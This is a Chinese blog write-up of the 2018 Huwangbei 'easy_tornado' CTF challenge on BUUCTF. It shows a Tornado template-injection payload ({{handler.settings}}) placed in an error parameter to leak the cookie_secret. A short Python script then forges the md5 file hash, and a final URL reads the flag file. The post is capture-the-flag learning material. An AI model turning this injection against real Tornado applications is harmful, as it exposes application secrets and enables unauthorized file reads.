护网杯 2018 easy_tornado 1【BUUCFT】【模板注入】

三个文件的全部信息

flag in /fllllllllllllag
render
md5(cookie_secret+md5(filename))

看了cookie 未找到cookie_secret

查询资料: [原题复现]2018护网杯(WEB)easy_tornado(模板注入)

获取cookie_secret

error?msg={{handler.settings}}

{'autoreload': True, 'compiled_template_cache': False, 'cookie_secret': '3fa1222e-6726-43dd-9d06-f443a417e574'}

python 构造 MD5 强烈建议使用 python 本地md5 加密我在线加密怎么都构建不出来

import hashlib
hash = hashlib.md5()

filename = '/fllllllllllllag'
cookie_secret = "3fa1222e-6726-43dd-9d06-f443a417e574"
hash.update(filename.encode('utf-8'))
s1 = hash.hexdigest()
hash = hashlib.md5()
hash.update((cookie_secret+s1).encode('utf-8'))
print(hash.hexdigest())

getFlag

http://8b5600f7-a54c-4356-aa62-ddf820dbe619.node3.buuoj.cn/file?filename=/fllllllllllllag&filehash=4edb201c923cd9abf13be0e6372e6273

/fllllllllllllag
flag{e0bdd279-6de9-4af3-a3c2-eb36b7b24a89}

posted @ 2020-07-20 11:29 Borber 阅读(555) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

BORBER

跌宕歌词纵横书卷不与遣年华

护网杯 2018 easy_tornado 1【BUUCFT】【模板注入】

BORBER

跌宕歌词 纵横书卷 不与遣年华

护网杯 2018 easy_tornado 1【BUUCFT】【模板注入】

跌宕歌词纵横书卷不与遣年华